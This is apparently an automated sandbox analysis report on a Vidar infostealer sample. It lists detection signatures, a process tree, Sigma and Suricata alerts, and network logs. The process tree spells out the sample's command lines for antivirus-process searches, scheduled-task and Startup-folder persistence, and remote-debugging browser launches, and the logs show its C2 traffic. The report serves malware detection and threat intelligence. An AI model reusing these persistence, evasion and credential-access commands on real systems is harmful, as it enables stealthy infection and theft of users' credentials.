Edit tour

Windows Analysis Report
JHPvqMzKbz.exe

Overview

General Information

Sample name:	JHPvqMzKbz.exe
Analysis ID:	1547069
MD5:	0f4af03d2ba59b5c68066c95b41bfad8
SHA1:	ecbb98b5bde92b2679696715e49b2e35793f8f9f
SHA256:	c263ebdc90fdb0a75d6570f178156c0ba665ac9f846b8172d7835733e5c3de59
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar

Yara detected Vidar stealer

Drops PE files with a suspicious file extension

Found strings related to Crypto-Mining

Maps a DLL or memory area into another process

Monitors registry run keys for changes

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Wscript called in batch mode (surpress errors)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64native

JHPvqMzKbz.exe (PID: 1796 cmdline: "C:\Users\user\Desktop\JHPvqMzKbz.exe" MD5: 0F4AF03D2BA59B5C68066C95B41BFAD8)

cmd.exe (PID: 8 cmdline: "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

tasklist.exe (PID: 8208 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 8216 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 8276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 8284 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8372 cmdline: cmd /c md 646751 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 8400 cmdline: findstr /V "AffiliateRobotsJoinedNewsletter" Purse MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8416 cmdline: cmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Plates.pif (PID: 8460 cmdline: Plates.pif c MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 8516 cmdline: cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

schtasks.exe (PID: 8580 cmdline: schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)

cmd.exe (PID: 8600 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & echo URL="C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chrome.exe (PID: 8480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)

msedge.exe (PID: 5548 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)

msedge.exe (PID: 6008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2592,14949538352353906560,7092886331907470317,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)

WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8460 -s 2316 MD5: 40A149513D721F096DDF50C04DA2F01F)

Conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

choice.exe (PID: 8480 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

chrome.exe (PID: 4316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2712,i,6102219914844560487,8884076869800475828,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2720 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

wscript.exe (PID: 8660 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

SkySync.scr (PID: 8704 cmdline: "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 8852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

SkySync.scr (PID: 8896 cmdline: "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

msedge.exe (PID: 1316 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate MD5: 40AAE14A5C86EA857FA6E5FED689C48E)

msedge.exe (PID: 6164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7521359329139554661,14603226509212112048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)

wscript.exe (PID: 5788 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

SkySync.scr (PID: 2896 cmdline: "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 4116 cmdline: cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

schtasks.exe (PID: 7208 cmdline: schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F MD5: 478BEAEC1C3A9417272BC8964ADD1CEE)

chrome.exe (PID: 920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 5204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2564,i,2928389766858636215,3856255721450826831,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2656 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

msedge.exe (PID: 476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 40AAE14A5C86EA857FA6E5FED689C48E)

msedge.exe (PID: 8896 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 /prefetch:3 MD5: 40AAE14A5C86EA857FA6E5FED689C48E)

identity_helper.exe (PID: 3672 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6932 /prefetch:8 MD5: 688D7C201AD85A9C6EDAFDC457E53219)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8516, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F, ProcessId: 8580, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1492, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js", ProcessId: 8660, ProcessName: wscript.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Plates.pif c, ParentImage: C:\Users\user\AppData\Local\Temp\646751\Plates.pif, ParentProcessId: 8460, ParentProcessName: Plates.pif, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8480, ProcessName: chrome.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Plates.pif c, CommandLine: Plates.pif c, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\646751\Plates.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\646751\Plates.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\646751\Plates.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8, ParentProcessName: cmd.exe, ProcessCommandLine: Plates.pif c, ProcessId: 8460, ProcessName: Plates.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\646751\Plates.pif, ProcessId: 8460, TargetFilename: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\JHPvqMzKbz.exe", ParentImage: C:\Users\user\Desktop\JHPvqMzKbz.exe, ParentProcessId: 1796, ParentProcessName: JHPvqMzKbz.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat, ProcessId: 8, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\646751\Plates.pif, ProcessId: 8460, TargetFilename: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1492, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js", ProcessId: 8660, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8600, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 8284, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T20:53:04.346658+0100	2044247	1	Malware Command and Control Activity Detected	188.245.203.37	443	192.168.11.20	49771	TCP
2024-11-01T20:57:47.110955+0100	2044247	1	Malware Command and Control Activity Detected	188.245.203.37	443	192.168.11.20	49803	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T20:53:05.477318+0100	2051831	1	Malware Command and Control Activity Detected	188.245.203.37	443	192.168.11.20	49772	TCP
2024-11-01T20:57:48.252472+0100	2051831	1	Malware Command and Control Activity Detected	188.245.203.37	443	192.168.11.20	49804	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T20:53:03.221238+0100	2049087	1	A Network Trojan was detected	192.168.11.20	49770	188.245.203.37	443	TCP
2024-11-01T20:58:38.334084+0100	2049087	1	A Network Trojan was detected	192.168.11.20	58993	188.245.203.37	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: JHPvqMzKbz.exe

ReversingLabs: Detection: 13%

Bitcoin Miner

Found strings related to Crypto-Mining

Source: msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: jsecoin.com/
Source: msedge.exe, 0000002F.00000002.172814089762.00007B1C00E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coinhive.com/

Source: JHPvqMzKbz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.203.37:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.152.20:443 -> 192.168.11.20:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.24.149:443 -> 192.168.11.20:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.11.20:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.203.37:443 -> 192.168.11.20:49800 version: TLS 1.2

Source: JHPvqMzKbz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00AF4005
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFC2FF FindFirstFileW,FindNextFileW,FindClose,	19_2_00AFC2FF
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_00AF494A
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	19_2_00AFCD9F
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFCD14 FindFirstFileW,FindClose,	19_2_00AFCD14
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00AFF5D8
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00AFF735
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFFA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,	19_2_00AFFA36
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00AF3CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\646751\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\646751	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 5MB later: 34MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.11.20:49770 -> 188.245.203.37:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.203.37:443 -> 192.168.11.20:49772
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.203.37:443 -> 192.168.11.20:49771
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.203.37:443 -> 192.168.11.20:49804
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.203.37:443 -> 192.168.11.20:49803
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.11.20:58993 -> 188.245.203.37:443

Source: unknown

Network traffic detected: DNS query count 30

Source: global traffic	HTTP traffic detected: GET /asg7rd HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /asg7rd HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e534de69cad646680d_15746174916847639097

Source: Joe Sandbox View	IP Address: 23.199.48.23 23.199.48.23
Source: Joe Sandbox View	IP Address: 20.189.173.1 20.189.173.1
Source: Joe Sandbox View	IP Address: 104.19.131.76 104.19.131.76
Source: Joe Sandbox View	IP Address: 68.67.179.155 68.67.179.155

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.203.79
Source: unknown	TCP traffic detected without corresponding DNS query: 23.44.203.79
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.32
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.195
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.152.20
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.24.149
